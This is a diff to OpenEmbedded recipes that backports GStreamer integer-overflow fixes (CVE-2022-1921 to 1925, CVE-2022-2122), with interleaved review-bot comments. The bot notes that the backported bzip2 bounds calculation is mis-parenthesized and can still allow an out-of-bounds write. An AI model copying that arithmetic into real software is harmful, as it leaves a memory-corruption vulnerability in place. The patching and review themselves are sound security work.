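Review bot: The provenance recorded in this patch header does not line up: the `From` line names commit cf887f1b8e228bff6e19829e6d03995d70ad739d, while the upstream link above `Upstream-Status` points at commit 0df0dd7fe388174e4835eda4526b47f470a56370. The `Upstream-Status: Backport` tag also carries no bracketed reference, unlike the flac patch in this same commit. Anyone auditing the backport against upstream cannot tell which of the two commits the hunks were taken from. I would put the reference on the tag itself, `Upstream-Status: Backport [https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/0df0dd7fe388174e4835eda4526b47f470a56370]`, and say in the header which branch the `From` hash belongs to.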
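diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
new file mode 100644
index 0000000000..99dbb2b1b0
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
@@ -0,0 +1,69 @@
+From f503caad676971933dc0b52c4b313e5ef0d6dbb0 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 12:00:48 +0300
+Subject: [PATCH] avidemux: Fix integer overflow resulting in heap corruption
+ in DIB buffer inversion code
+
+Check that width*bpp/8 doesn't overflow a guint and also that
+height*stride fits into the provided buffer without overflowing.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1921
+
+See https://gstreamer.freedesktop.org/security/sa-2022-0001.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1224
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2608>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/f503caad676971933dc0b52c4b313e5ef0d6dbb0
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/avi/gstavidemux.c | 17 ++++++++++++++---
+ 1 file changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/gst/avi/gstavidemux.c b/gst/avi/gstavidemux.c
+index eafe865494c..0d18a6495c7 100644
+--- a/gst/avi/gstavidemux.c
++++ b/gst/avi/gstavidemux.c
+@@ -4973,8 +4973,8 @@ swap_line (guint8 * d1, guint8 * d2, guint8 * tmp, gint bytes)
+ static GstBuffer *
+ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
+ {
+- gint y, w, h;
+- gint bpp, stride;
++ guint y, w, h;
++ guint bpp, stride;
+ guint8 *tmp = NULL;
+ GstMapInfo map;
+ guint32 fourcc;
+@@ -5001,12 +5001,23 @@ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
+ h = stream->strf.vids->height;
+ w = stream->strf.vids->width;
+ bpp = stream->strf.vids->bit_cnt ? stream->strf.vids->bit_cnt : 8;
++
++ if ((guint64) w * ((guint64) bpp / 8) > G_MAXUINT - 4) {
++ GST_WARNING ("Width x stride overflows");
++ return buf;
++ }
++
++ if (w == 0 || h == 0) {
++ GST_WARNING ("Zero width or height");
++ return buf;
++ }
++
+ stride = GST_ROUND_UP_4 (w * (bpp / 8));
+
+ buf = gst_buffer_make_writable (buf);
+
+ gst_buffer_map (buf, &map, GST_MAP_READWRITE);
+- if (map.size < (stride * h)) {
++ if (map.size < ((guint64) stride * (guint64) h)) {
+ GST_WARNING ("Buffer is smaller than reported Width x Height x Depth");
+ gst_buffer_unmap (buf, &map);
+ return buf;
+--
+GitLab
+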
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
new file mode 100644
index 0000000000..ebffbc473d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
@@ -0,0 +1,214 @@
1From ad6012159acf18c6b5c0f4edf037e8c9a2dbc966 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
3Date: Wed, 18 May 2022 11:24:37 +0300
4Subject: [PATCH] matroskademux: Fix integer overflows in zlib/bz2/etc
5 decompression code
6
7Various variables were of smaller types than needed and there were no
8checks for any overflows when doing additions on the sizes. This is all
9checked now.
10
11In addition the size of the decompressed data is limited to 120MB now as
12any larger sizes are likely pathological and we can avoid out of memory
13situations in many cases like this.
14
15Also fix a bug where the available output size on the next iteration in
16the zlib/bz2 decompression code was provided too large and could
17potentially lead to out of bound writes.
18
19Thanks to Adam Doupe for analyzing and reporting the issue.
20
21CVE: CVE-2022-1922, CVE-2022-1923, CVE-2022-1924, CVE-2022-1925
22
23https://gstreamer.freedesktop.org/security/sa-2022-0002.html
24
25Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
26
27Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
28
29CVE: CVE-2022-1922 CVE-2022-1923 CVE-2022-1924 CVE-2022-1925
30https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/ad6012159acf18c6b5c0f4edf037e8c9a2dbc966
31Upstream-Status: Backport
32Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
33---
34 .../gst/matroska/matroska-read-common.c | 76 +++++++++++++++----
35 1 file changed, 61 insertions(+), 15 deletions(-)
36
37diff --git a/gst/matroska/matroska-read-common.c b/gst/matroska/matroska-read-common.c
38index eb317644cc5..6fadbba9567 100644
39--- a/gst/matroska/matroska-read-common.c
40+++ b/gst/matroska/matroska-read-common.c
41@@ -70,6 +70,10 @@ typedef struct
42 gboolean audio_only;
43 } TargetTypeContext;
44
45+/* 120MB as maximum decompressed data size. Anything bigger is likely
46+ * pathological, and like this we avoid out of memory situations in many cases
47+ */
48+#define MAX_DECOMPRESS_SIZE (120 * 1024 * 1024)
49
50 static gboolean
51 gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
52@@ -77,19 +81,23 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
53 GstMatroskaTrackCompressionAlgorithm algo)
54 {
55 guint8 *new_data = NULL;
56- guint new_size = 0;
57+ gsize new_size = 0;
58 guint8 *data = *data_out;
59- guint size = *size_out;
60+ const gsize size = *size_out;
61 gboolean ret = TRUE;
62
63+ if (size > G_MAXUINT32) {
64+ GST_WARNING ("too large compressed data buffer.");
65+ ret = FALSE;
66+ goto out;
67+ }
68+
69 if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_ZLIB) {
70 #ifdef HAVE_ZLIB
71 /* zlib encoded data */
72 z_stream zstream;
73- guint orig_size;
74 int result;
75
76- orig_size = size;
77 zstream.zalloc = (alloc_func) 0;
78 zstream.zfree = (free_func) 0;
79 zstream.opaque = (voidpf) 0;
80@@ -99,8 +107,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
81 goto out;
82 }
83 zstream.next_in = (Bytef *) data;
84- zstream.avail_in = orig_size;
85- new_size = orig_size;
86+ zstream.avail_in = size;
87+ new_size = size;
88 new_data = g_malloc (new_size);
89 zstream.avail_out = new_size;
90 zstream.next_out = (Bytef *) new_data;
91@@ -114,10 +122,18 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
92 break;
93 }
94
95+ if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
96+ GST_WARNING ("too big decompressed data");
97+ result = Z_MEM_ERROR;
98+ break;
99+ }
100+
101 new_size += 4096;
102 new_data = g_realloc (new_data, new_size);
103 zstream.next_out = (Bytef *) (new_data + zstream.total_out);
104- zstream.avail_out += 4096;
105+ /* avail_out is an unsigned int */
106+ g_assert (new_size - zstream.total_out <= G_MAXUINT);
107+ zstream.avail_out = new_size - zstream.total_out;
108 } while (zstream.avail_in > 0);
109
110 if (result != Z_STREAM_END) {
111@@ -137,13 +153,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
112 #ifdef HAVE_BZ2
113 /* bzip2 encoded data */
114 bz_stream bzstream;
115- guint orig_size;
116 int result;
117
118 bzstream.bzalloc = NULL;
119 bzstream.bzfree = NULL;
120 bzstream.opaque = NULL;
121- orig_size = size;
122
123 if (BZ2_bzDecompressInit (&bzstream, 0, 0) != BZ_OK) {
124 GST_WARNING ("bzip2 initialization failed.");
125@@ -152,8 +166,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
126 }
127
128 bzstream.next_in = (char *) data;
129- bzstream.avail_in = orig_size;
130- new_size = orig_size;
131+ bzstream.avail_in = size;
132+ new_size = size;
133 new_data = g_malloc (new_size);
134 bzstream.avail_out = new_size;
135 bzstream.next_out = (char *) new_data;
136@@ -167,17 +181,31 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
137 break;
138 }
139
140+ if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
141+ GST_WARNING ("too big decompressed data");
142+ result = BZ_MEM_ERROR;
143+ break;
144+ }
145+
146 new_size += 4096;
147 new_data = g_realloc (new_data, new_size);
148- bzstream.next_out = (char *) (new_data + bzstream.total_out_lo32);
149- bzstream.avail_out += 4096;
150+ bzstream.next_out =
151+ (char *) (new_data + ((guint64) bzstream.total_out_hi32 << 32) +
152+ bzstream.total_out_lo32);
153+ /* avail_out is an unsigned int */
154+ g_assert (new_size - ((guint64) bzstream.total_out_hi32 << 32) +
155+ bzstream.total_out_lo32 <= G_MAXUINT);
156+ bzstream.avail_out =
157+ new_size - ((guint64) bzstream.total_out_hi32 << 32) +
158+ bzstream.total_out_lo32;
159 } while (bzstream.avail_in > 0);
160
161 if (result != BZ_STREAM_END) {
162 ret = FALSE;
163 g_free (new_data);
164 } else {
165- new_size = bzstream.total_out_lo32;
166+ new_size =
167+ ((guint64) bzstream.total_out_hi32 << 32) + bzstream.total_out_lo32;
168 }
169 BZ2_bzDecompressEnd (&bzstream);
170
171@@ -189,7 +217,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
172 } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_LZO1X) {
173 /* lzo encoded data */
174 int result;
175- int orig_size, out_size;
176+ gint orig_size, out_size;
177+
178+ if (size > G_MAXINT) {
179+ GST_WARNING ("too large compressed data buffer.");
180+ ret = FALSE;
181+ goto out;
182+ }
183
184 orig_size = size;
185 out_size = size;
186@@ -203,6 +237,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
187 result = lzo1x_decode (new_data, &out_size, data, &orig_size);
188
189 if (orig_size > 0) {
190+ if (new_size > G_MAXINT - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
191+ GST_WARNING ("too big decompressed data");
192+ result = LZO_ERROR;
193+ break;
194+ }
195 new_size += 4096;
196 new_data = g_realloc (new_data, new_size);
197 }
198@@ -221,6 +260,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
199 } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_HEADERSTRIP) {
200 /* header stripped encoded data */
201 if (enc->comp_settings_length > 0) {
202+ if (size > G_MAXSIZE - enc->comp_settings_length
203+ || size + enc->comp_settings_length > MAX_DECOMPRESS_SIZE) {
204+ GST_WARNING ("too big decompressed data");
205+ ret = FALSE;
206+ goto out;
207+ }
208+
209 new_data = g_malloc (size + enc->comp_settings_length);
210 new_size = size + enc->comp_settings_length;
211
212--
213GitLab
214
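Review bot: In the bzip2 branch of gst_matroska_decompress_data the remaining-output computation subtracts only the high word and then adds the low word: `new_size - ((guint64) bzstream.total_out_hi32 << 32) + bzstream.total_out_lo32`. With `total_out_hi32` at 0 this evaluates to `new_size + total_out_lo32`, so `avail_out` can be larger than the space left after `next_out`, which is the out-of-bounds write the commit message says it removes. The zlib branch's `new_size - zstream.total_out` is correct. The total needs its own parentheses in both the `g_assert` and the assignment, e.g. `bzstream.avail_out = new_size - (((guint64) bzstream.total_out_hi32 << 32) + bzstream.total_out_lo32);`. The `g_assert` guards here should also not be treated as the bound, since they disappear in builds with `G_DISABLE_ASSERT`.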
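--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
@@ -0,0 +1,60 @@
+From 14d306da6da51a762c4dc701d161bb52ab66d774 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Mon, 30 May 2022 10:15:37 +0300
+Subject: [PATCH] qtdemux: Fix integer overflows in zlib decompression code
+
+Various variables were of smaller types than needed and there were no
+checks for any overflows when doing additions on the sizes. This is all
+checked now.
+
+In addition the size of the decompressed data is limited to 200MB now as
+any larger sizes are likely pathological and we can avoid out of memory
+situations in many cases like this.
+
+Also fix a bug where the available output size on the next iteration in
+the zlib decompression code was provided too large and could
+potentially lead to out of bound writes.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: tbd
+
+https://gstreamer.freedesktop.org/security/sa-2022-0003.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/14d306da6da51a762c4dc701d161bb52ab66d774
+CVE: CVE-2022-2122
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ gst/isomp4/qtdemux.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/gst/isomp4/qtdemux.c b/gst/isomp4/qtdemux.c
+index 7cc346b1e63..97ba0799a8d 100644
+--- a/gst/isomp4/qtdemux.c
++++ b/gst/isomp4/qtdemux.c
+@@ -7905,10 +7905,16 @@ qtdemux_inflate (void *z_buffer, guint z_length, guint * length)
+ break;
+ }
+
++ if (*length > G_MAXUINT - 4096 || *length > QTDEMUX_MAX_SAMPLE_INDEX_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ ret = Z_MEM_ERROR;
++ break;
++ }
++
+ *length += 4096;
+ buffer = (guint8 *) g_realloc (buffer, *length);
+ z.next_out = (Bytef *) (buffer + z.total_out);
+- z.avail_out += 4096;
++ z.avail_out += *length - z.total_out;
+ } while (z.avail_in > 0);
+
+ if (ret != Z_STREAM_END) {
+--
+GitLab
+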
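Review bot: In the added line `z.avail_out += *length - z.total_out;` the `+=` is only correct while `z.avail_out` is zero at the moment the buffer is grown; any leftover value would again overstate the free output space, which is the out-of-bounds write the commit message sets out to fix. Assigning the value outright, `z.avail_out = *length - z.total_out;`, keeps the output window equal to the reallocated buffer whatever inflate() left behind. The line matches the upstream commit, so this is better raised upstream than changed in the backport alone. qtdemux_inflate starts and ends outside the hunk, so the state on loop entry is inferred.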
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
index 75dd029109..831a317a82 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
@@ -1,9 +1,19 @@
1require gstreamer1.0-plugins-common.inc 1require gstreamer1.0-plugins-common.inc
2 2
3DESCRIPTION = "'Good' GStreamer plugins"
4HOMEPAGE = "https://gstreamer.freedesktop.org/"
5BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues"
6
3SRC_URI = " \ 7SRC_URI = " \
4 https://gstreamer.freedesktop.org/src/gst-plugins-good/gst-plugins-good-${PV}.tar.xz \ 8 https://gstreamer.freedesktop.org/src/gst-plugins-good/gst-plugins-good-${PV}.tar.xz \
5 file://0001-qmlgl-ensure-Qt-defines-GLsync-to-fix-compile-on-som.patch \ 9 file://0001-qmlgl-ensure-Qt-defines-GLsync-to-fix-compile-on-som.patch \
6 file://0001-qt-include-ext-qt-gstqtgl.h-instead-of-gst-gl-gstglf.patch \ 10 file://0001-qt-include-ext-qt-gstqtgl.h-instead-of-gst-gl-gstglf.patch \
11 file://CVE-2021-3497.patch \
12 file://CVE-2021-3498.patch \
13 file://CVE-2022-1920.patch \
14 file://CVE-2022-1921.patch \
15 file://CVE-2022-1922-1923-1924-1925.patch \
16 file://CVE-2022-2122.patch \
7 " 17 "
8 18
9SRC_URI[md5sum] = "c79b6c2f8eaadb2bb66615b694db399e" 19SRC_URI[md5sum] = "c79b6c2f8eaadb2bb66615b694db399e"
@@ -30,6 +40,8 @@ X11DEPENDS = "virtual/libx11 libsm libxrender libxfixes libxdamage"
30X11ENABLEOPTS = "-Dximagesrc=enabled -Dximagesrc-xshm=enabled -Dximagesrc-xfixes=enabled -Dximagesrc-xdamage=enabled" 40X11ENABLEOPTS = "-Dximagesrc=enabled -Dximagesrc-xshm=enabled -Dximagesrc-xfixes=enabled -Dximagesrc-xdamage=enabled"
31X11DISABLEOPTS = "-Dximagesrc=disabled -Dximagesrc-xshm=disabled -Dximagesrc-xfixes=disabled -Dximagesrc-xdamage=disabled" 41X11DISABLEOPTS = "-Dximagesrc=disabled -Dximagesrc-xshm=disabled -Dximagesrc-xfixes=disabled -Dximagesrc-xdamage=disabled"
32 42
43QT5WAYLANDDEPENDS = "${@bb.utils.contains("DISTRO_FEATURES", "wayland", "qtwayland", "", d)}"
44
33PACKAGECONFIG[bz2] = "-Dbz2=enabled,-Dbz2=disabled,bzip2" 45PACKAGECONFIG[bz2] = "-Dbz2=enabled,-Dbz2=disabled,bzip2"
34PACKAGECONFIG[cairo] = "-Dcairo=enabled,-Dcairo=disabled,cairo" 46PACKAGECONFIG[cairo] = "-Dcairo=enabled,-Dcairo=disabled,cairo"
35PACKAGECONFIG[dv1394] = "-Ddv1394=enabled,-Ddv1394=disabled,libiec61883 libavc1394 libraw1394" 47PACKAGECONFIG[dv1394] = "-Ddv1394=enabled,-Ddv1394=disabled,libiec61883 libavc1394 libraw1394"
@@ -44,7 +56,7 @@ PACKAGECONFIG[libpng] = "-Dpng=enabled,-Dpng=disabled,libpng"
44PACKAGECONFIG[libv4l2] = "-Dv4l2-libv4l2=enabled,-Dv4l2-libv4l2=disabled,v4l-utils" 56PACKAGECONFIG[libv4l2] = "-Dv4l2-libv4l2=enabled,-Dv4l2-libv4l2=disabled,v4l-utils"
45PACKAGECONFIG[mpg123] = "-Dmpg123=enabled,-Dmpg123=disabled,mpg123" 57PACKAGECONFIG[mpg123] = "-Dmpg123=enabled,-Dmpg123=disabled,mpg123"
46PACKAGECONFIG[pulseaudio] = "-Dpulse=enabled,-Dpulse=disabled,pulseaudio" 58PACKAGECONFIG[pulseaudio] = "-Dpulse=enabled,-Dpulse=disabled,pulseaudio"
47PACKAGECONFIG[qt5] = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native" 59PACKAGECONFIG[qt5] = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native ${QT5WAYLANDDEPENDS}"
48PACKAGECONFIG[soup] = "-Dsoup=enabled,-Dsoup=disabled,libsoup-2.4" 60PACKAGECONFIG[soup] = "-Dsoup=enabled,-Dsoup=disabled,libsoup-2.4"
49PACKAGECONFIG[speex] = "-Dspeex=enabled,-Dspeex=disabled,speex" 61PACKAGECONFIG[speex] = "-Dspeex=enabled,-Dspeex=disabled,speex"
50PACKAGECONFIG[taglib] = "-Dtaglib=enabled,-Dtaglib=disabled,taglib" 62PACKAGECONFIG[taglib] = "-Dtaglib=enabled,-Dtaglib=disabled,taglib"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
index d9ec82d887..afde9a013d 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
@@ -1,5 +1,9 @@
1require gstreamer1.0-plugins-common.inc 1require gstreamer1.0-plugins-common.inc
2 2
3DESCRIPTION = "'Ugly GStreamer plugins"
4HOMEPAGE = "https://gstreamer.freedesktop.org/"
5BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-ugly/-/issues"
6
3LIC_FILES_CHKSUM = "file://COPYING;md5=a6f89e2100d9b6cdffcea4f398e37343 \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=a6f89e2100d9b6cdffcea4f398e37343 \
4 file://tests/check/elements/xingmux.c;beginline=1;endline=21;md5=4c771b8af188724855cb99cadd390068" 8 file://tests/check/elements/xingmux.c;beginline=1;endline=21;md5=4c771b8af188724855cb99cadd390068"
5 9
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
index 14b34a2808..9c7f0e078c 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Python bindings for GStreamer 1.0" 1SUMMARY = "Python bindings for GStreamer 1.0"
2DESCRIPTION = "GStreamer Python binding overrides (complementing the bindings \
3provided by python-gi) "
2HOMEPAGE = "http://cgit.freedesktop.org/gstreamer/gst-python/" 4HOMEPAGE = "http://cgit.freedesktop.org/gstreamer/gst-python/"
3SECTION = "multimedia" 5SECTION = "multimedia"
4 6
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
index 9d9b1b8757..af9b2c5a97 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
@@ -1,4 +1,5 @@
1SUMMARY = "VA-API support to GStreamer" 1SUMMARY = "VA-API support to GStreamer"
2HOMEPAGE = "https://gstreamer.freedesktop.org/"
2DESCRIPTION = "gstreamer-vaapi consists of a collection of VA-API \ 3DESCRIPTION = "gstreamer-vaapi consists of a collection of VA-API \
3based plugins for GStreamer and helper libraries: `vaapidecode', \ 4based plugins for GStreamer and helper libraries: `vaapidecode', \
4`vaapiconvert', and `vaapisink'." 5`vaapiconvert', and `vaapisink'."
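--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
@@ -0,0 +1,33 @@
+From 1db36347d05d88835519368442e9aa89c64091ad Mon Sep 17 00:00:00 2001
+From: Seungha Yang <seungha@centricular.com>
+Date: Tue, 15 Sep 2020 00:54:58 +0900
+Subject: [PATCH] tests: seek: Don't use too strict timeout for validation
+
+Expected segment-done message might not be seen within expected
+time if system is not powerful enough.
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/625>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/gstreamer/gstreamer/commit?id=f44312ae5d831438fcf8041162079c65321c588c]
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+Signed-off-by: Jose Quaresma <quaresma.jose@gmail.com>
+---
+ tests/check/pipelines/seek.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/check/pipelines/seek.c b/tests/check/pipelines/seek.c
+index 28bb8846d..5f7447bc5 100644
+--- a/tests/check/pipelines/seek.c
++++ b/tests/check/pipelines/seek.c
+@@ -521,7 +521,7 @@ GST_START_TEST (test_loopback_2)
+
+ GST_INFO ("wait for segment done message");
+
+- msg = gst_bus_timed_pop_filtered (bus, (GstClockTime) 2 * GST_SECOND,
++ msg = gst_bus_timed_pop_filtered (bus, GST_CLOCK_TIME_NONE,
+ GST_MESSAGE_SEGMENT_DONE | GST_MESSAGE_ERROR);
+ fail_unless (msg, "no message within the timed window");
+ fail_unless_equals_string (GST_MESSAGE_TYPE_NAME (msg), "segment-done");
+--
+2.29.2
+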
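Review bot: Passing `GST_CLOCK_TIME_NONE` makes `gst_bus_timed_pop_filtered()` block without limit, so the following `fail_unless (msg, "no message within the timed window")` can no longer fire on a timeout. A lost segment-done message would presumably hang the test until the harness kills it, rather than failing with that message. A generous but finite bound keeps the diagnostic meaningful on slow machines, for example `msg = gst_bus_timed_pop_filtered (bus, (GstClockTime) 30 * GST_SECOND,`. test_loopback_2 starts and ends outside the hunk.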
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
index 7afe56cd7b..14793b7fdf 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
@@ -22,6 +22,7 @@ SRC_URI = " \
22 file://0003-meson-Add-valgrind-feature.patch \ 22 file://0003-meson-Add-valgrind-feature.patch \
23 file://0004-meson-Add-option-for-installed-tests.patch \ 23 file://0004-meson-Add-option-for-installed-tests.patch \
24 file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \ 24 file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \
25 file://0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch \
25" 26"
26SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a" 27SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a"
27SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7" 28SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7"
@@ -40,7 +41,7 @@ PACKAGECONFIG[unwind] = "-Dlibunwind=enabled,-Dlibunwind=disabled,libunwind"
40PACKAGECONFIG[dw] = "-Dlibdw=enabled,-Dlibdw=disabled,elfutils" 41PACKAGECONFIG[dw] = "-Dlibdw=enabled,-Dlibdw=disabled,elfutils"
41PACKAGECONFIG[bash-completion] = "-Dbash-completion=enabled,-Dbash-completion=disabled,bash-completion" 42PACKAGECONFIG[bash-completion] = "-Dbash-completion=enabled,-Dbash-completion=disabled,bash-completion"
42PACKAGECONFIG[tools] = "-Dtools=enabled,-Dtools=disabled" 43PACKAGECONFIG[tools] = "-Dtools=enabled,-Dtools=disabled"
43PACKAGECONFIG[setcap] = ",,libcap libcap-native" 44PACKAGECONFIG[setcap] = "-Dptp-helper-permissions=capabilities,,libcap libcap-native"
44 45
45# TODO: put this in a gettext.bbclass patch 46# TODO: put this in a gettext.bbclass patch
46def gettext_oemeson(d): 47def gettext_oemeson(d):
@@ -74,4 +75,20 @@ FILES_${PN}-dbg += "${datadir}/gdb ${datadir}/gstreamer-1.0/gdb"
74 75
75CVE_PRODUCT = "gstreamer" 76CVE_PRODUCT = "gstreamer"
76 77
78# CPE entries for gst-plugins-base are listed as gstreamer issues
79# so we need to ignore the false hits
80CVE_CHECK_WHITELIST += "CVE-2021-3522"
81
82# CPE entries for gst-plugins-good are listed as gstreamer issues
83# so we need to ignore the false hits
84CVE_CHECK_WHITELIST += "CVE-2021-3497"
85CVE_CHECK_WHITELIST += "CVE-2021-3498"
86CVE_CHECK_WHITELIST += "CVE-2022-1920"
87CVE_CHECK_WHITELIST += "CVE-2022-1921"
88CVE_CHECK_WHITELIST += "CVE-2022-1922"
89CVE_CHECK_WHITELIST += "CVE-2022-1923"
90CVE_CHECK_WHITELIST += "CVE-2022-1924"
91CVE_CHECK_WHITELIST += "CVE-2022-1925"
92CVE_CHECK_WHITELIST += "CVE-2022-2122"
93
77require gstreamer1.0-ptest.inc 94require gstreamer1.0-ptest.inc
diff --git a/meta/recipes-multimedia/lame/lame_3.100.bb b/meta/recipes-multimedia/lame/lame_3.100.bb
index 7f8996fb52..d007e0a495 100644
--- a/meta/recipes-multimedia/lame/lame_3.100.bb
+++ b/meta/recipes-multimedia/lame/lame_3.100.bb
@@ -1,5 +1,6 @@
1SUMMARY = "High quality MP3 audio encoder" 1SUMMARY = "High quality MP3 audio encoder"
2HOMEPAGE = "http://lame.sourceforge.net/" 2DESCRIPTION = "LAME is an educational tool to be used for learning about MP3 encoding."
3HOMEPAGE = "https://lame.sourceforge.io/"
3BUGTRACKER = "http://sourceforge.net/tracker/?group_id=290&atid=100290" 4BUGTRACKER = "http://sourceforge.net/tracker/?group_id=290&atid=100290"
4SECTION = "console/utils" 5SECTION = "console/utils"
5LICENSE = "LGPLv2+" 6LICENSE = "LGPLv2+"
diff --git a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
index 8ff8889b60..0ef5d947c3 100644
--- a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
+++ b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
@@ -1,4 +1,7 @@
1SUMMARY = "ATSC A/52 surround sound stream decoder" 1SUMMARY = "ATSC A/52 surround sound stream decoder"
2DESCRIPTION = "Library for decoding ATSC A/52 streams. The A/52 standard \
3is used in a variety of applications, including digital television \
4and DVD. It is also known as AC-3."
2HOMEPAGE = "http://liba52.sourceforge.net/" 5HOMEPAGE = "http://liba52.sourceforge.net/"
3LICENSE = "GPLv2+" 6LICENSE = "GPLv2+"
